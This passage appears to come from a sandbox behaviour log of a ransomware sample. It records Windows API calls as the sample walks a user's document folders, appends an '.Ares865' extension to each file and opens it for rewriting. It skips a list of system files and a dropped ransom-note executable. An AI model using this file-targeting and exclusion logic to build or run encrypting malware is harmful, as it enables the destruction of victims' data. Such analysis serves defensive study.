documents\\n6totl\\mfye2jthnbv wvhiisr\\v5cl yss1mpdhll.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\V5cL YSs1MpdhLl.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\v5cl yss1mpdhll.csv.ares865"), dwFlags=0x1) returned 1 [0094.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\V5cL YSs1MpdhLl.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\v5cl yss1mpdhll.csv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.198] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=64554) returned 1 [0094.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\Y5VGp-XA f9VF.pdf.Ares865") returned 95 [0094.202] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\Y5VGp-XA f9VF.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\y5vgp-xa f9vf.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\Y5VGp-XA f9VF.pdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\y5vgp-xa f9vf.pdf.ares865"), dwFlags=0x1) returned 1 [0094.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\Y5VGp-XA f9VF.pdf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\y5vgp-xa f9vf.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.207] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=42581) returned 1 [0094.210] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy" [0094.211] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\4EVHeN.xls.Ares865") returned 99 [0094.211] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\4EVHeN.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\4evhen.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\4EVHeN.xls.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\4evhen.xls.ares865"), dwFlags=0x1) returned 1 [0094.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\4EVHeN.xls.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\4evhen.xls.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.212] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=69437) returned 1 [0094.217] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\j521.ots.Ares865") returned 97 [0094.217] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\j521.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\j521.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\j521.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\j521.ots.ares865"), dwFlags=0x1) returned 1 [0094.218] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\j521.ots.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\j521.ots.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=95022) returned 1 [0094.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\rCbZ3QPkVPU.pps.Ares865") returned 104 [0094.223] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\rCbZ3QPkVPU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\rcbz3qpkvpu.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\rCbZ3QPkVPU.pps.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\rcbz3qpkvpu.pps.ares865"), dwFlags=0x1) returned 1 [0094.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\rCbZ3QPkVPU.pps.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\rcbz3qpkvpu.pps.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.224] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=87082) returned 1 [0094.229] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q" [0094.230] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q\\JM FgGlsj.rtf.Ares865") returned 118 [0094.230] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q\\JM FgGlsj.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\-nkabxrjwzdb18q\\jm fgglsj.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q\\JM FgGlsj.rtf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\-nkabxrjwzdb18q\\jm fgglsj.rtf.ares865"), dwFlags=0x1) returned 1 [0094.231] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q\\JM FgGlsj.rtf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\-nkabxrjwzdb18q\\jm fgglsj.rtf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.231] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=47018) returned 1 [0094.237] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q\\smiBSZIQEhs96nxaE7e.xlsx.Ares865") returned 129 [0094.237] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q\\smiBSZIQEhs96nxaE7e.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\-nkabxrjwzdb18q\\smibsziqehs96nxae7e.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q\\smiBSZIQEhs96nxaE7e.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\-nkabxrjwzdb18q\\smibsziqehs96nxae7e.xlsx.ares865"), dwFlags=0x1) returned 1 [0094.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\n6tOtL\\mfYE2jthnbv WVhiisR\\I-TxZlgyjy\\-nkAbxRjWZdB18q\\smiBSZIQEhs96nxaE7e.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\n6totl\\mfye2jthnbv wvhiisr\\i-txzlgyjy\\-nkabxrjwzdb18q\\smibsziqehs96nxae7e.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=99627) returned 1 [0094.243] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos" [0094.244] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw" [0094.244] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\UziFSNO1C3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\UziFSNO1C3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\UziFSNO1C3" [0094.245] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\uFLKR3mnKupk4xRitg5" [0094.245] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud" [0094.245] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK" [0094.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\HHAB9kIYb-giueSNBjLX" [0094.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m" [0094.246] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz" [0094.247] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6" [0094.247] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes" [0094.247] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\desktop.ini.Ares865") returned 72 [0094.247] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0094.249] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.250] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=216) returned 1 [0094.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\Favorites.vss.Ares865") returned 74 [0094.253] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\Favorites.vss.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\favorites.vss.ares865"), dwFlags=0x1) returned 1 [0094.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\Favorites.vss.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\favorites.vss.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.254] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0094.254] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0094.255] CloseHandle (hObject=0x0) returned 0 [0094.255] CloseHandle (hObject=0x118) returned 1 [0094.255] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d268b20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d268b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0094.255] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0094.255] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x4d268b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d268b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="aoldtz.exe") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2=".") returned 1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="..") returned 1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="windows") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="bootmgr") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="temp") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="pagefile.sys") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="boot") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="ids.txt") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="ntuser.dat") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="perflogs") returned -1 [0094.255] lstrcmpiW (lpString1="_private", lpString2="MSBuild") returned -1 [0094.255] lstrlenW (lpString="_private") returned 8 [0094.255] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\Favorites.vss") returned 66 [0094.255] lstrcpyW (in: lpString1=0x2cce46a, lpString2="_private" | out: lpString1="_private") returned="_private" [0094.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0094.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f00d8 [0094.255] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0094.255] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x4d268b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d268b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0094.255] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0094.255] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0094.255] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\_private", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\_private" [0094.256] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\_private\\folder.ico.Ares865") returned 80 [0094.256] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\_private\\folder.ico.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\_private\\folder.ico.ares865"), dwFlags=0x1) returned 1 [0094.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Shapes\\_private\\folder.ico.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\my shapes\\_private\\folder.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.257] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29926) returned 1 [0094.262] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures" [0094.262] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL" [0094.263] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\WLV6HYI5Srhb" [0094.263] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15" [0094.263] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\My Pictures\\lHkSyhM2yL\\PfNk15\\Spxultm2cr2kg9MH4qf-" [0094.264] lstrcpynW (in: lpString1=0x2cce400, 